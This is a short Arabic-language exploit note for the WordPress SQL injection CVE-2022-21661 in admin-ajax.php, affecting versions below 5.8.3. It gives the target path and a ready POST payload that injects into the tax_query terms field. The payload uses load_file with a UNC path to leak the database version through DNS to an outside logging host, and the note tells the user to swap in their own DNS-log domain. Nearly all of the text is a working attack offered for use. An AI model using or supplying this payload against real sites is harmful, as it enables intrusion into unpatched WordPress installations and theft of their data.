
استغلال لثغرة حقن SQL في WordPress CVE-2022-21661 في admin-ajax.php، باستخدام تسريب البيانات خارج النطاق عبر DNS للإصدارات الأقل من 5.8.3.
#version<5.8.3
المسار:http://your target/wp-admin/admin-ajax.php
نوع الحقن هو خارج النطاق (out-of-band)، تحتاج إلى تحديد dnslog بنفسك واستبدال ceye.io
بيانات POST:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}